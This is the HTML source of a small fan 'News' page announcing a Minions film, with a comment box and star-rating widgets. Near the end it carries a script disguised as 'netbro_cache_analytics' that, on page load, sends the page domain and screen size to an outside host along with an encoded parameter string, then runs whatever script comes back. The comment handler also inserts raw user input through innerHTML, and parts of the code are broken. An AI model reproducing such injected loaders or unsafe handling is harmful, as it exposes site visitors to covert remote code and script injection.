<!DOCTYPE html>
<html>
<title>News</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css">
  <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.2.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="dist/starrr.css">
<style>
body,h1 {font-family: "Raleway", sans-serif}
body, html {height: 100%}
#mySidenav a {
    position: absolute;
    left: -120px;
    transition: 0.3s;
    padding: 15px;
    width: 170px;
    text-decoration: none;
    font-size: 20px;
    color: white;
    border-radius: 0 5px 5px 0;
}

#mySidenav a:hover {
    left: 0;
}

#home {
    top: 110px;
    background-color: #4CAF50;
}

#news {
    top: 190px;
    background-color: #2196F3;
}

#contact {
    top: 270px;
    background-color: #f44336;
}

#signin {
    top: 350px;
    background-color: yellow;
}

#signup {
    top: 430px;
    background-color: purple;
}

#about {
    top: 510px;
    background-color: grey;
}
.bgimg {
    background-image: url('minion.jpg');
    min-height: 100%;
    background-position: center;
    background-size: cover;
}

img.ribbon {
      position: fixed;
      z-index: 1;
      top: 0;
      right: 0;
      border: 0;
      cursor: pointer; }

    .container {
      margin-top: 60px;
      text-align: center;
      max-width: 450px; }

    input {
      width: 30px;
      margin: 10px 0;
    }
    div.stars {
  width: 270px;
  display: inline-block;
}

input.star { display: none; }

label.star {
  float: right;
  padding: 10px;
  font-size: 36px;
  color: #444;
  transition: all .2s;
}

input.star:checked ~ label.star:before {
  content: '\2605';
  color: #FD4;
  transition: all .25s;
}

input.star-5:checked ~ label.star:before {
  color: #FE7;
  text-shadow: 0 0 20px #952;
}

input.star-1:checked ~ label.star:before { color: #F62; }

label.star:hover { transform: rotate(-15deg) scale(1.3); }

label.star:before {
  content: '\2605';
}
</style>
<body>

<div class="bgimg w3-display-container w3-animate-opacity w3-text-white">

  



<div id="mySidenav" class="sidenav">
  <a href="../index.html" id="home">Home</a>
  <a href="../news/news.html" id="news">News</a>
  <a href="../contact/contact.html" id="contact">Contact</a>
  <a href="../signin/signin.html" id="signin">Sign In</a>
  <a href="../signup/signup.html" id="signup">Sign Up</a>
  <a href="../about/about.html" id="about">About</a>
</div>

</div>
  <div class="w3-display-middle w3-margin-top w3-center">
 	<h1 class="w3-xlarge w3-animate-left w3-padding w3-black w3-opacity-min w3-round-xxlarge">COMING SOON</h1>
    <h1 class="w3-xxxlarge w3-animate-top w3-padding w3-white w3-opacity-min w3-round-xxlarge">MINIONs: Despicable Me 4</h1>
    <hr class="w3-border-grey" style="margin:auto;width:40%">
    <p class="w3-large w3-center w3-animate-right w3-padding w3-black w3-opacity-min w3-round-xxlarge">20 DECEMBER 2018</p>
  </div>

<textarea name="comment" id="comment" placeholder="Type your comment here"></textarea>
  <div id="commentCount"></div>
  <button type="button" onclick="submitComment()">Submit</button>
  <!--<ul id="comments">
  </ul>-->
  <div id="comments"></div>
  
  <script type="text/javascript">
    function submitComment() {
      // ambil value komentar
      var comment = document.getElementById("comment")
      if (comment.value !== '') {
        // bentuk li baru
        var li = document.createElement("h1")
        li.innerHTML = comment.value
        // tambahkan li baru ke ul
        var ul = document.getElementById("comments")
        ul.appendChild(li)
        // kosongkan textarea comment
        comment.value = ""
        comment.focus()
        // isikan commentCount
        var commentCount = document.getElementById("commentCount")
        commentCount.innerHTML = ul.children.length + " comment(s)"


        
        return button
      }
    }
    

     $('#star1').starrr({
      change: function(e, value){
        if (value) {
          $('.your-choice-was').show();
          $('.choice').text(value);
        } else {
          $('.your-choice-was').hide();
        }
      }
    });

    var $s2input = $('#star2_input');
    $('#star2').starrr({
      max: 10,
      rating: $s2input.val(),
      change: function(e, value){
        $s2input.val(value).trigger('input');
      }
    });
  </script>
  <script type="text/javascript">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

    ga('create', 'UA-39205841-5', 'dobtco.github.io');
    ga('send', 'pageview');
  </script>


     <div class="container">
    <h3>Star</h3>

    <h5>Click to rate:</h5>
    <div class='starrr' id='star1'></div>
    <div>&nbsp;
      <span class='your-choice-was' style='display: none;'>
        Your rating was <span class='choice'></span>.
      </span>
    </div>
    <div class="stars">
  <form action="">
    <input class="star star-5" id="star-5" type="radio" name="star"/>
    <label class="star star-5" for="star-5"></label>
    <input class="star star-4" id="star-4" type="radio" name="star"/>
    <label class="star star-4" for="star-4"></label>
    <input class="star star-3" id="star-3" type="radio" name="star"/>
    <label class="star star-3" for="star-3"></label>
    <input class="star star-2" id="star-2" type="radio" name="star"/>
    <label class="star star-2" for="star-2"></label>
    <input class="star star-1" id="star-1" type="radio" name="star"/>
    <label class="star star-1" for="star-1"></label>
  </form>
</div>
    <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.js"></script>
  <script src="dist/starrr.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m7dffiZ%2fChSyqwjz%2bBXVu4YdZcgo3dVkGmA1eoZxwbW3OCotyAc%2b%2bXXhFI6yIJu7slBKMJ21IpC2DkWi0Q9jQYIQxfoWAqJKjMimt9FnzgFYAYJp3c9AQl2IDlXi1%2f%2bmA7pFhLqJJFbnigFLWyUaB6BtkZSEUuhWJQIPI1N%2bf4KgenSQu6iKSPGNensoiQ%2bgeACCtSDZhmdj6wVwG46AvdhRN93BdmyHSsOaHQicfF6a%2fCh9D8uE1SkQPKKhXcFccbYX%2f2op0GrnIhqPrWWWfUCaaQjKSclmgewQQPxg84ey9jC2O0TTdHQqTVFdsh2CvXZmd%2faR3gnCBsj6aQEU1DO2Gq%2fvoFk23k4gDCsj8djpvr7HUieY7KjTX0edP0iF9UXav0eBvDHGVzg6O9aDwximbKFzH9959%2bbr0PlZ2oJ33tg9argxhvQqbyyQzkj2yAtkI7T7wwxQQx%2f7d2pNykxDVRNNLfp9ItFrSokpHc5LSU9rTNbQ88lMfUJcp%2f7G%2f%2bUJ2aeVAJ5YNDsNNl0ZIug%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
<a href="https://github.com/dobtco/starrr">
 <a href="https://github.com/simplyyysherly">
    <img class="ribbon" src="https://s3.amazonaws.com/github/ribbons/forkme_right_gray_6d6d6d.png" >
  </a>


</body>
</html>
